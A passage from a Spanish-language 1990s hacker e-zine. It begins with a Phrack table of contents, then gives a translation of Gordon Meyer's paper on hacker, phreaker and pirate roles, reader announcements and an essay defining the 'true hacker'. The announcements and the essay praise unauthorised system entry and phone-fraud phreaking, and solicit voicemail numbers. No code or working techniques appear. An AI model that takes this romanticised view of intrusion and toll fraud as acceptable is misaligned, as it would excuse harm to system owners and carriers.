23. Acronyms Part III by Firm G.R.A.S.P. 45K
24. Acronyms Part IV by Firm G.R.A.S.P. 52K
25. Acronyms Part V by Firm G.R.A.S.P. 46K
26. International Scene by Various Sources 51K
27. Phrack World News by Datastream Cowboy 24K
Total: 1152K
-= Phrack 44 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 16K
2. Phrack Loopback / Editorial 57K
3. Line Noise Part I 51K
4. Line Noise Part II 35K
5. Computer Cop Prophile by The Grimmace 22K
6. Conference News Part I by Various Sources 55K
7. Conference News Part II by Various Sources 35K
8. Conference News Part III by Various Sources 50K
9. Intro to Packet Radio by Larry Kollar * 16K
10. The Moeller Papers 30K
11. Sara Gordon v. Kohntark Part I 12K
12. Sara Gordon v. Kohntark Part II 47K
13. Northern Telecom's FMT-150B/C/D by FyberLyte 16K
14. A Guide to Data General's AOS/VS Part I by Herd Beast 46K
15. A Guide to Data General's AOS/VS Part II by Herd Beast 50K
16. An Interview With Agent Steal by Agent 005 14K
17. Visionary - The Story About Him by Visionary 23K
18. Searching The Dialog Information Service by Al Capone 48K
19. Northern Telecom's SL-1 by Iceman 30K
20. Safe and Easy Carding by VaxBuster 18K
21. Datapac by Synapse 36K
22. An Introduction to the Decserver 200 By Opticon 16K
23. LOD Communications BBS Archive Information 29K
24. MOD Family Portrait 35K
25. Gail Takes A Break 49K
26. International Scenes by Various Sources 25K
27. Phrack World News by Datastream Cowboy 22K
Total: 882K
-= Phrack 45 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 17K
2. Phrack Loopback Part I 31K
3. Phrack Loopback Part II / Editorial 40K
4. Line Noise Part I 49K
5. Line Noise Part II 50K
6. Line Noise Part III 59K
7. Phrack Prophile on Control C 22K
8. Running a BBS on X.25 by Seven Up 15K
9. No Time for Goodbyes by Emmanuel Goldstein 21K
10. Security Guidelines * 55K
11. Ho Ho Con Miscellany by Various Sources 32K
12. Quentin Strikes Again by The Omega and White Knight 28K
13. 10th Chaos Computer Congress by Manny E. Farber 23K
14. Defcon II information 26K
15. VMS Information by Various Sources 34K
16. DCL BBS PROGRAM by Raoul 23K
17. Hollywood-Style Bits & Bytes by Richard Goodwin 50K
18. Fraudulent Applications of 900 Services by Co/Dec 15K
19. Screwing Over Your Local McDonald's by Charlie X 20K
20. The Senator Markey Hearing Transcripts 72K
21. The Universal Data Converter by Maldoror 45K
22. BOX.EXE - Box Program for Sound Blaster by The Fixer 13K
23. Introduction To Octel's ASPEN by Optik Nerve 12K
24. Radio Free Berkeley Information 35K
25. The MCX7700 PABX System by Dr. Delam 22K
26. Cellular Debug Mode Commands by Various Sources * 13K
27. International Scenes by Various Sources 63K
28. Phrack World News by Datastream Cowboy 17K
Total: 902K
-= Phrack 46 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 17K
2. Phrack Loopback / Editorial 52K
3. Line Noise 61K
4. Line Noise 56K
5. Phrack Prophile on Minor Threat 12K
6. Paid Advertisement 62K
7. Paid Advertisement (cont) 45K
8. The Wonderful World of Pagers by Erik Bloodaxe 24K
9. Legal Info by Szechuan Death 13K
10. A Guide to Porno Boxes by Carl Corey 13K
11. Unix Hacking - Tools of the Trade by The Shining 42K
12. The fingerd Trojan Horse by Hitman Italy * 32K
13. The Phrack University Dialup List 12K
14. A Little About Dialcom by Herd Beast 29K
15. VisaNet Operations Part I by Ice Jey 50K
16. VisaNet Operations Part II by Ice Jey 44K
17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam 25K
18. Startalk by The Red Skull 21K
19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau 45K
20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau 42K
21. The Groom Lake Desert Rat by PsychoSpy 44K
22. HOPE by Erik Bloodaxe 51K
23. Cyber Christ Bites the Big Apple by Winn Schwartau 60K
24. The ABCs of Better Hotel Staying by Seven Up 12K
25. AT&T Definity System 75/85 by Erudite 13K
26. Keytrap v1.0 Keyboard Key Logger by Dcypher 35K
27. International Scenes by Various Sources 44K
28. Phrack World News by Datastream Cowboy 38K
Total: 996K
-= Phrack 47 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 16K
2. Phrack Loopback / Editorial 52K
3. Line Noise 59K
4. Line Noise 65K
5. The #hack FAQ (Part 1) by Voyager * 39K
6. The #hack FAQ (Part 2) by Voyager * 38K
7. The #hack FAQ (Part 3) by Voyager * 51K
8. The #hack FAQ (Part 4) by Voyager * 47K
9. DEFCon Information 28K
10. HoHoCon by Netta Gilboa 30K
11. HoHoCon by Count Zero 33K
12. HoHo Miscellany by Various Sources 33K
13. An Overview of Prepaid Calling Cards by Treason 29K
14. The Glenayre GL3000 Paging and Voice Retrieval System by Armitage 25K
15. Complete Guide to Hacking Meridian Voice Mail by Substance 10K
16. DBS Primer from American Hacker Magazine 45K
17. Your New Windows Background (Part 1) by The Man 39K
18. Your New Windows Background (Part 2) by The Man 46K
19. A Guide To British Telecom's Caller ID Service by Dr. B0B 31K
20. A Day in The Life of a Warez Broker by Xxxx Xxxxxxxx 13K
21. International Scenes by Various Sources 40K
22. Phrack World News by Datastream Cowboy 38K
Total: 808K
-= Phrack 48 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by the Editorial Staff 13K
2. Phrack Loopback / Editorial 55K
3. Line Noise (Part I) 63K
4. Line Noise (Part II) 51K
5. Phrack Pro-Philes on the New Editors 23K
6. Motorola Command Mode Information by Cherokee * 38K
7. Tandy / Radio Shack Cellular Phones by Damien Thorn 43K
8. The Craft Access Terminal by Boss Hogg 36K
9. Information About NT's FMT-150/B/C/D by StaTiC 22K
10. Electronic Telephone Cards (Part I) 39K
11. Electronic Telephone Cards (Part II) 66K
12. Keytrap Revisited by Sendai 13K
13. Project Neptune by Daemon9 52K
14. IP-Spoofing Demystified by Daemon9 * 25K
15. Netmon by Daemon9 21K
16. The Truth...and Nothing but the Truth by Steve Fleming 19K
17. International Scenes by Various Sources 33K
18. Phrack World News by Datastream Cowboy 21K
Total: 633K
-= Phrack 49 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction 07K
2. Phrack loopback 06K
3. Line Noise 65K
4. Phrack Prophile on Mudge by Phrack Staff 08K
5. Introduction to Telephony and PBX systems by Cavalier 100K
6. Project Loki: ICMP Tunneling by daemon9/alhambra 10K
7. Project Hades: TCP weaknesses by daemon9 * 38K
8. Introduction to CGI and CGI vulnerabilities by G. Gilliss * 12K
9. Content-Blind Cancelbot by Dr. Dimitri Vulis 40K
10. A Steganography Improvement Proposal by cjm1 06K
11. South Western Bell Lineman Work Codes by Icon 18K
12. Introduction to the FedLine software system by Parmaster 19K
13. Telephone Company Customer Applications by Voyager 38K
14. Smashing The Stack For Fun And Profit by Aleph1 66K
15. TCP port Stealth Scanning by Uriel * 32K
16. Phrack World News by Disorder 109K
Total: 575K
el Duke de Sicilia
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 08. HACKERS, PHREACKERS Y PIRATAS º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Texto presentado en la conferencia de la Midwest American Culture /
Popular Culture Association realizada el 5 de noviembre de 1977 en la
Universidad de Bowling Green State.
------------------------------------------------------------------------------
Hackers, phreakers y piratas por Gordon Meyer
------------------------------------------------------------------------------
El avance de la era informatica ha introducido nuevos terminos en el
vocabulario de cada dia. Una de estas palabras, hacker, tiene que ver
con los delitos informaticos. Todos estamos familiarizados con las
historias de chavales que consiguen entrar en las corporaciones
informatizadas. Pero tengo la impresion de que el termino "hacker" es
uno de los peor entendidos, aplicados y, por tanto, usados en la era
informatica. Considerando la cantidad de terminos tecnicos que la
informatica nos ha traido, esto parece ser una exageracion, pero
permitanme explicarme.
La cultura popular define a los hackers como aquellos que, con ayuda de
sus conocimientos informaticos consiguen acceder a los ordenadores de
los bancos y de los negociados del gobierno. Bucean por informacion que
no les pertenece, roban software caro y realizan transacciones de una
cuenta bancaria a otra.
Los criminologos, por otra parte, describen a los hackers en terminos
menos halage¤os. Donn Parker los denomina "violadores electronicos" y
August Bequai los describe como "vandalos electronicos". Ambos, aunque
aseveran que las actividades de los hackers son ilegales, eluden
habilmente llamarlos "criminales informaticos". Hacen una clara
distincion entre el hacker que realiza sus actividades por diversion y
el empleado que de repente decide hacer algo malo.
Por tanto, parece que tenemos una definicion en la que caben dos
extremos: por un lado, el moderno ladron de bancos y por otro el chaval
inquieto. Ambas actividades (y todas las intermedias) son calificadas
con el mismo termino. Dificilmente se podria considerar esto como un
ejemplo de conceptualizacion precisa.
Una gran parte de esta ambigedad puede seguirse desde el origen durante
estos aproximadamente 20 a¤os de vida del mencionado termino. El termino
comenzo a usarse aplicandolo a un grupo de pioneros de la informatica
del MIT, a principios de la decada de 1960. Desde entonces, y casi hasta
finales de la decada de 1970, un hacker era una persona obsesionada por
conocer lo mas posible sobre los sistemas informaticos. Los dise¤adores
del ordenador Apple, Jobs y Wozniack, pueden considerarse hackers en
este sentido de la palabra.
Pero a principios de la decada de 1980, influenciados por la difusion de
la pelicula Juegos de Guerra, y el ampliamente publicado arresto de una
"banda de hackers" conocida como la 414, los hackers pasaron a ser
considerados como chicos jovenes capaces de violar sistemas informaticos
de grandes empresas y del gobierno. Desgraciadamente, los medios de
informacion y la comunidad cientifica social no ha puesto mucho esfuerzo
por variar esta definicion.
El problema para llegar a una definicion mas precisa radica, tanto en la
poca informacion que hay sobre sus actividades diaria, como en el hecho
de que lo que se conoce de ellos no siempre cabe bajo las etiquetas de
los delitos conocidos. Es decir, no hay una definicion legal que sea
aplicable a los hackers, ni todas sus actividades conllevan la violacion
de las leyes. Esto lleva a que la aplicacion del termino varie segun los
casos, dependiendo de los cargos que se puedan imputar y no a raiz de un
claro entendimiento de lo que el termino significa.
Este problema, y la falta de entendimiento de lo que significa ser un
hacker, convierte a esta en una etiqueta excesivamente utilizada para
aplicar a muchos tipos de intrusiones informaticas. Parker y Bequai, dos
lideres en el estudio de los delitos informaticos, utilizan el termino
"hacker" de formas ligeramente diferentes. Parker reconoce que hacking no
abarca todo el rango de actividades asociadas a la violacion de los
sistemas informaticos, pero lo prefiere al termino "phreaking", que
considera muy oscuro. Por otra parte, Bequai no rechaza el termino
"phreaking" y a menudo lo aplica a hechos que Parker califica como de
hacker. Bequai confunde aun mas el termino al definir al hacker como
alguien que utiliza ilegalmente las tarjetas de credito telefonico para
acceder a sistemas que distribuyen software comercial ilegalmente.
Volveremos a la definicion mas tarde, y veremos que tiene poco que ver
con las actuaciones propias de los hackers, pero es ilustrativa de otros
tipos de actividades informaticas inusuales.
Este trabajo se ha obtenido en base a una investigacion etnografica del
submundo informatico oculto. La mayor parte de la informacion se ha
obtenido a traves de entrevistas, llevadas a cabo en vivo por mi propia
persona, con otros participantes en algunas actividades que mas tarde
describire. Los terminos que utilizare, "hacker", "phreaker" y "pirata"
se presentan y definen tal y como los entienden aquellos que se
identifican con estos papeles. Mi referencia para este trabajo ha sido
el submundo informatico oculto, no las leyes que se han hecho para
controlarlo. Las tipificaciones e intenciones que se formulan al final
deben entenderse, de alguna forma, como tentativas. Este articulo
refleja el progreso del trabajo en mi tesis doctoral, y espero reordenar
todos estos terminos en un entorno sociologico. Estas definiciones
basicas son un primer paso necesario para delimitar, en el sentido
sociologico, el submundo informatico oculto.
En primer lugar, el area de los hackers. En la tradicion de esta
comunidad informatica, el hacker puede realizar dos tipos de
actividades: bien acceder a un sistema informatico, o bien algo mas
general, como explorar y aprender a utilizar un sistema informatico. En
la primera connotacion, el termino lleva asociados las herramientas y
trucos para obtener cuentas de usuarios validos de un sistema
informatico, que de otra forma serian inaccesibles para los hackers. Se
podria pensar que esta palabra esta intimamente relacionada con la
naturaleza repetitiva de los intentos de acceso. Ademas, una vez que se
ha conseguido acceder, las cuentas ilicitas con a veces compartidas con
otros asociados, denominandolas "frescas". He aqui la vision
estereotipada de los medios de comunicacion de los hackers un joven de
menos de veinte a¤os, con conocimientos de informatica, pegado al
teclado de su ordenador, siempre en busca de una cuenta no usada o un
punto debil en el sistema de seguridad. Aunque esta vision no es muy
precisa, representa bastante bien el aspecto del termino.
La segunda dimension del mencionado termino se ocupa de lo que sucede
una vez que se ha conseguido acceder al sistema cuando se ha conseguido
una clave de acceso. Como el sistema esta siendo utilizado sin
autorizacion, el hacker no suele tener, el terminos generales, acceso a
los manuales de operacion y otros recursos disponibles para los usuarios
legitimos del sistema. Por tanto, el usuario experimenta con estructuras
de comandos y explora ficheros para conocer el uso que se da al sistema.
En oposicion con el primer aspecto del termino, aqui no se trata solo de
acceder al sistema (aunque alguno podria estar buscando niveles de
acceso mas restringidos), sino de aprender mas sobre la operacion
general del sistema. Contrariamente a lo que piensan los medios de
comunicacion, la mayoria de los hackers no destruyen no da¤an
deliberadamente los datos. El hacerlo iria en contra de su intencion de
mezclarse con el usuario normal y atraeria la atencion sobre su
presencia, haciendo que la cuenta usada sea borrada. Despues de gastar
un tiempo sustancias en conseguir la cuenta, el hacker pone una alta
prioridad para que su uso no sea descubierto.
Ademas de la obvia relacion entre las dos acepciones, la palabra "hacker"
se reserva generalmente a aquellos que se dedican al segundo tipo. En
otras palabras, un hacker es una persona que tiene el conocimiento,
habilidad y deseo de explorar completamente un sistema informatico. El
mero hecho de conseguir el acceso (adivinando la clave de acceso) no es
suficiente para conseguir la denominacion. Debe haber un deseo de
liderar, explotar y usar el sistema despues de haber accedido a el. Esta
distincion parece logica, ya que no todos los intrusos mantienen el
interes una vez que han logrado acceder al sistema. En el submundo
informatico, las claves de acceso y las cuentas suelen intercambiarse y
ponerse a disposicion del uso general. Por tanto, el hecho de conseguir
el acceso puede considerarse como la parte "facil", por lo que aquellos
que utilizan y exploran los sistemas son los que tienen un mayor
prestigio.
La segunda actividad es la de los phreakers telefonicos. Se convirtio en
una actividad de uso comun cuando se publicaron las aventuras de John
Draper, en un articulo de la revista Esquire, en 1971. Se trata de una
forma de evitar los mecanismos de facturacion de las compa¤ias
telefonicas. Permite llamar a cualquiera de cualquier parte del mundo
sin coste practicamente. En muchos casos, tambien evita, o al menos
inhibe, la posibilidad de que se pueda trazar el camino de la llamada
hasta su origen, evitando asi la posibilidad de ser cogido.
Par la mayor parte de los miembros del submundo informatico, esta es
simplemente una herramienta para poder realizar llamadas de larga
distancia sin tener que pagar enormes facturas. La cantidad de personas
que se consideran phreakers, contrariamente a lo que sucede con los
hackers, es relativamente peque¤a. Pero aquellos que si se consideran
phreakers lo hacen para explorar el sistema telefonico. La mayoria de la
gente, aunque usa el telefono, sabe muy poco acerca de el. Los phreakers,
por otra parte, quieren aprender mucho sobre el. Este deseo de
conocimiento lo resume asi un phreaker activo:
"El sistema telefonico es la cosa mas interesante y fascinante que
conozco. Hay tantas cosas que aprender. Incluso los phreakers tienen
diferentes areas de conocimiento. Hay tantas cosas que se pueden conocer
que en una tentativa puede aprenderse algo muy importante y en la
siguiente no. O puede suceder lo contrario. Todo depende de como y donde
obtener la informacion. Yo mismo quisiera trabajar para una empresa de
telecomunicaciones, haciendo algo interesante, como programar una
central de conmutacion. Algo que no sea una tarea esclavizadora e
insignificante. Algo que sea divertido. Pero hay que correr el riesgo
para participar, a no ser que tengas la fortuna de trabajar para una de
estas compa¤ias. El tener acceso a las cosas de estas empresas, como
manuales, etc., debe ser grandioso".
La mayoria de la gente del submundo no se acerca al sistema telefonico
con esa pasion. Solo estan interesados en explorar sus debilidades para
otros fines. En este caso, el sistema telefonico es un fin en si mismo.
Otro entrevistado que se identificaba a si mismo como hacker, explicaba:
"Se muy poco sobre telefons simplemente soy un hacker. Mira, no puedo
llamar a esos numeros directamente. Mucha gente hace lo mismo. En mi
caso, hacer de phreaker es una herramienta, muy utilizada, pero una
herramienta al fin y al cabo".
En el submundo informatico, al posibilidad de actuar asi se agradece.
Con la division del sistema Bell, llego el uso de la tarjeta de credito
telefonica. Estas tarjetas abrieron la puerta para realizar este tipo de
actividades a gran escala. Hoy en dia no hace falta ningun equipo
especial. Solo un telefono con marcacion por tonos y un numero de una de
esas tarjetas de credito, y con eso se puede llamar a cualquier parte
del mundo. De igual forma que los participantes con mas conocimientos y
motivacion son llamados hackers, aquellos que desean conocer el sistema
telefonico son denominados phreakers. El uso de las herramientas que les
son propias no esta limitada a los phreakers, pero no es suficiente para
merecer la distincion.
Finalmente llegamos a la "telepirateria" del software. Consiste en la
distribucion ilegal de software protegido por los derechos de autor. No
me refiero a la copia e intercambio de diskettes que se produce entre
conocidos (que es igualmente ilegal), sino a la actividad que se realiza
alrededor de los sistemas BBS que se especializan en este tipo de
trafico. El acceso a este tipo de servicios se consigue contribuyendo, a
traves de un modem telefonico, con una copia de un programa comercial.
Este acto delictivo permite a los usuarios copiar, o "cargar", de tres a
seis programas que otros hayan aportado. Asi, por el precio de una sola
llamada telefonica, uno puede amontonar una gran cantidad de paquetes de
software. En muchas ocasiones, incluso se evita pagar la llamada
telefonica. Notese que al contrario que las dos actividades de hacker y
phreaker, no hay ninguna consideracion al margen de "prestigio" o
"motivacion" en la telepirateria. En este caso, el cometer los actos
basta para "merecer" el titulo.
La telepirateria esta hecha para las masas. Al contrario de lo que
sucede con los hackers y los phreakers, no requiere ninguna habilidad
especial. Cualquiera que tenga un ordenador con modem y algun software
dispone de los elementos necesarios para entrar en el mundo de la
telepirateria. Debido a que la telepirateria no requiere conocimientos
especiales, el papel de los piratas no inspira ningun tipo de admiracion
o prestigio en el submundo informatico. (Una posible excepcion la
constituyen aquellos que son capaces de quitar la proteccion del
software comercial.) Aunque los hackers y los phreakers de la
informatica probablemente no desaprueben la pirateria, y sin duda
participen individualmente de alguna forma, son menos activos (o menos
visibles) en los BBS que se dedican a la telepirateria. Tienden a
evitarlos porque la mayoria de los telepiratas carecen de conocimientos
informaticos especiales, y por tanto son conocidos por abusar en exceso
de la red telefonica para conseguir el ultimo programa de juegos. Un
hacker mantiene la teoria de que son estos piratas los culpables de la
mayoria de los fraudes con tarjetas de credito telefonicas.
"Los medios de comunicacion afirman que son unicamente los hackers los
responsables de las perdidas de las grandes compa¤ias de
telecomunicaciones y de los servicios de larga distancia. Este no es el
caso. Nosotros (los hackers) representamos solo una peque¤a parte de
estas perdidas. El resto esta causado por los piratas y ladrones que
venden estos codigos en la calle."
Otro hacker explica que el proceso de intercambiar grandes programas
comerciales por modem normalmente lleva varias horas, y son estas
llamadas, y no las que realizan los "entusiastas de telecomunicaciones",
las que preocupan a las compa¤ias telefonicas. Pero sin considerar la
ausencia de conocimientos especiales, por la fama de abusar de la red, o
por alguna otra razon, parece haber algun tipo de division entre los
hackers / phreakers y los telepiratas.
Despues de haber descrito los tres papeles del submundo informatico,
podemos ver que la definicion presentada al principio, segun la cual un
hacker era alguien que usaba una tarjeta de credito telefonico robada
para cargar alguno de los ultimos juegos, no refleja las definiciones
dadas en el propio submundo informatico. Obviamente, corresponde a la
descripcion de un telepirata y no a las acciones propias de un hacker o
un phreaker.
En todo esto hay una serie de avisos. No quiero dar la impresion de que
un individuo es un hacker, un phreaker o un telepirata exclusivamente.
Estas categorias no son mutuamente excluyentes. De hecho, muchos
individuos son capaces de actuar en mas de uno de estos papeles. Dada
esta multiplicidad de papeles, ¨como podemos los sociologos, periodistas
e investigadores encontrar definiciones precisas para aplicar a las
actividades encontradas en casos especificos? Creo que la respuesta se
encuentra en buscar los objetivos que se han expuesto previamente.
Recuerdese que el objetivo de un hacker no es entrar en un sistema, sino
aprender como funciona. El objetivo de un phreaker no es realizar
llamadas de larga distancia gratis, sino descubrir lo que la compa¤ia
telefonica no explica sobre su red y el objetivo de un telepirata es
obtener una copia del software mas moderno para su ordenador. Asi,
aunque un individuo tenga un conocimiento especial sobre los sistemas
telefonicos, cuando realiza una
llamada de larga distancia gratis para
cargar un juego, esta actuando como un telepirata.
En cierto modo, esto es un puro argumento semantico. Independientemente
de que a un hacker se le etiquete erroneamente como telepirata, los
accesos ilegales y las copias no autorizadas de software comercial van a
seguir produciendose. Pero si queremos conocer los nuevos desarrollos de
la era informatica, debemos identificar y reconocer los tres tipos de
actividades con que nos podemos encontrar. El agrupar los tres tipos
bajo una sola etiqueta es mas que impreciso, ignora las relaciones
funcionales y diferencias entre ellos.
Hay que admitir, de todas formas, que siempre habra alguien que este en
desacuerdo con las diferencias que se han descrito entre los grupos. En
el desarrollo de esta investigacion, quedo de manifiesto que no los
individuos que realizan actualmente estas actividades se ponen de
acuerdo en cuanto a donde estan las fronteras. Las categorias y papeles,
como se ha indicado previamente, no son mutuamente exclusivos. En
particular, el mundo de los hackers y los phreakers estan muy
relacionados. Pero, de la misma forma que no debemos agrupar toda la
actividad del submundo informatico bajo la acepcion de hacker, tampoco
debemos insistir en que nuestras definiciones sean exclusivas hasta el
punto de ignorar lo que representan.
Las tipologias que he presentado son amplias y necesitan ser depuradas.
Pero representan un paso mas en la representacion precisa,
especificacion e identificacion de las actividades que se dan en el
submundo de la informatica.
*Articulo estraido de la revista electronica Cyber-Campus:
"http://arraquis.dif.um.es/~cyber" --> Revista Cyber-Campus
os recomiendo que le echeis un vistazo.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 09. ANUNCIOS, PETICIONES, ETC... º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
1. Ahora que la revista empieza a rodar por ahi, algunos mencionan mi nombre
(Incluso aparezco en algunos buscadores, guau) y muchos se confunden. No soy
muy quisquilloso con eso, pero me apodo eljaker, todojunto y con k. No es
que sea algo muy importante, pero mola ver tu nombre bien escrito por ahi.
recordad (-: ELJAKER :-)
2. Sigo necesitando colaboradores, en aspectos como los virus, el phreacking,
etc... A ver si alguien se anima.
3. No os corteis, estamos avidos de articulos, cualquiera que nos mandeis
seguro que lo publicamos.
4. Acaban de salir los dos primeros Expedientes secretos de los saqueadores.
Estos expedientes contienen metodos de hacking, explicitos y comprobados,
explicando con detalle tecnicas concretas de hacking. Explican con todo
detalle tecnicas reales y que funcionan en los sistemas actuales,
comprobados por los miembros de nuestro equipo. Devido a su contenido,
que podria ser peligroso si callese en malas manos, hemos decidido no
distribuirlos publicamente y solo se lo daremos a nuestros
mas cercanos colaboradores y a los que nos proporcionen informaciones
valiosas y buenos articulos.
Los dos primeros expedientes son estos:
X1 - Claves de doble uso
X2 - Analisis completo y hacking del ftp-daemon (En preparacion)
5. Teniamos una exclusiva que era una bomba, pero por problemas tecnicos
no hemos podido acabarla para este numero. Para terminarlo necesitamos
vuestra colaboracion, y os pedimos que nos envies numeros de telefono de
buzones de voz, fonobuzones o contestadores multiples que conozcais.
6. El numero pasado, anunciabamos la salida de una nueva publicacion
en castellano que trataba estos mismos temas, la TYHS. Tambien deciamos
que esto se movia, pues es verdad, acaban de salir dos mas, tambien muy
completas y prometedoras. Son la WEB-HACK y la CYBER-HACK. Tal vez en
proximos numeros hagamos una comparativa de ellas.
7. Debido al fastidioso lapso de los examenes de febrero, el grupo se
disolvera temporalmente. Para asuntos muy urgentes podeis acudir a
warezzman. Sera solo un mes, no os preocupeis. Podeis seguir dejando
mensajes, pero tardaremos algo en contestarlos.
8. Necesitamos informacion sobre el sistema telefonico espa¤ol, en
aspectos como el caller-id, codigos de prefijo (Ej. *XX), traceo
de llamadas, centralitas digitales y analogicas, desvio de llamadas,
bloqueo de llamadas, llamadas anonimas, etc... Ya se que es dificil y
que la telefonica es muy dura, pero macho, algo hay que hacer para
remediarlo.
9. Leyendo las otras revistas en castellano sobre hacking, hemos visto
que nos llaman "la competencia", yo no lo veo asi, en realidad teniamos
que colaborar y ayudarnos. Yo estoy dispuesto a ayudar y a recibir ayuda
y me ofrezco para escribir un articulo en alguna de ellas, si sus
editores quieren.
10. Se estan pensando nuevas secciones de la revista, como humor,
noticias, cotilleos, entrevistas, etc... decirnos que opinias de ellas
y si quereis que las incluyamos en proximos numeros.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 10. ¨SER O NO SER HACKER? º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
¨Ser o no ser hacker? Por Francisco Jose Hurtado
Un amigo me pregunto que me interesaba y cuando dije que los
ordenadores, me pregunto que sistemas operativos manejaba. Tras nombrar
los pocos que conocia, me pregunto: ¨eres un hacker?
Bueno, esa pregunta ha estado dandome vueltas en la cabeza hasta ahora.
¨Que es exactamente un hacker?, ¨un hacker real?
Para aquellos que no saben de que va el tema, las noticias en los medios
de comunicacion (y a veces los comics) han sacado las cosas de traste
Un hacker, sin tener mucha idea, puede ser desde un usuario de
ordenador, hasta alguien que destruye todo lo que encuentra a su paso en
un terminal de ordenador.
Algunos idiotas, se dedicaban, hace unos a¤os, a comprar un ordenador
por Navidades, con un modem, y sacar informacion interesante, como
juegos, datos, etc. de todo tipo de empresas y borrarlos o venderlos
(ahora esos suelen estar en esas mismas empresas porque esa es la unica
manera de mantenerlos callados sobre lo que encontraron en los
ficheros). Ahora bien, ¨de quien es la culpa? Pues de los hackers. Y
esto tal vez sea porque a los medios de comunicacion de les suena bien
la palabra, aunque me temo que solo una infima minoria sepa el
significado correcto de la palabra. No busqueis en el diccionario,
porque no tiene nada que ver con acuchillar o cortar.
Los verdaderos hackers son inteligentes, tienen que serlo Puede ser
que vayan muy bien en la Facultad, porque no tienen nada mas que hacer;
o bien, que no les vaya nada bien, porque les parezca aburrida. Los que
se aburren, es porque no les interesa aprender lo que en la Facultad les
puedan ense¤ar. Un verdadero hacker quiere aprender cosas nuevas, y como
les ense¤an siempre lo mismo, una y otra vez, una y otra vez, pues
terminan aburriendose.
Los verdaderos hackers son curiosos y pacientes. Si no fuesen
pacientes, terminarian por hartarse de querer entrar en el mismo sistema
una y otra vez, asi que lo dejarian por perdido.
Un verdadero hacker NO se mete en el sistema para borrarlo todo o para
vender lo que consiga a otros. Los verdaderos hackers, quieren aprender,
o quieren satisfacer su curiosidad, esa es la unica finalidad de
introducirse en el sistema. Lo que quieren es buscar dentro de un lugar
en el que nunca han estado, explorar todos los peque¤os rincones de un
mundo diferente del que ya conocen y que les aburre. ¨Porque destruir
algo y perderse el placer de decir a los demas que hemos estado en un
lugar donde ellos no han estado? ¨Porque destruir todo el mundo de la
mayoria de hackers que solo cogen informacion por puro placer y exploran
por lo mismo?
Los hackers son inconformistas, ¨porque pagar por unas llamadas de
telefono que cuestas pesetas, miles de pesetas? ¨Porque pagar por una
informacion que solo vamos a nombrar una vez en nuestra vida, por
ejemplo, un fichero de historia?
Los hackers son discretos, quiero decir que cuando entran en un sistema
es para su propia satisfaccion, no van por ahi cantandolo a los cuatro
vientos. La mayoria de los casos de "hackers" que conocemos por la
prensa son en realidad "fantasming", con lo que quiero decir, que si tu
le dices a un amigo que has entrado en cierto sistema, de boca en boca
ira pasando hasta que termine por saberse que tu habias entrado en un
sistema cinco veces mayor (por el ruido de los canales de comunicacion),
que habias destruido miles de ficheros y que habias inutilizado en
sistema. Por eso es mejor mantener la boca cerrada.
Llamar gratis y entrar en un sistema que no has visto antes son dos de
las experiencias mas excitantes conocidas por el hombre, pero es una
actividad que no seria posible de no ser por el phreaking (deporte
consistente en hacer llamadas de telefono utilizando herramientas de
hardware y software para enga¤ar a la compa¤ia telefonica y que no nos
cobre las llamadas).
Honestamente, no se si a alguien le gustara este texto, o si le servira
para aclarar un poco sus ideas (a lo mejor se las enredo un poco mas),
pero espero que alguien entienda lo que es realmente un hacker.
Y a todos esos a quienes les gusta calificarse de "hackers": "¨a ver si
crecemos un poquito?".
Si quereis un fichero que pueda cambiar vuestro modo de ver el mundo de
los hackers, los crackers y los phreakers: "The Hacker's Manifesto".
Buscadlo en La Red, por alguno de los archiconocidos buscadores, ya sea
el www.lycos.com, el www.webcrawler.com, www.yahoo.com, o cualquier
otro.
"Raw Data for Raw Nerves"
*Articulo estraido de la revista electronica Cyber-Campus:
"http://arraquis.dif.um.es/~cyber" --> Revista Cyber-Campus
os recomiendo que le echeis un vistazo.
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 11. DESPEDIDA º
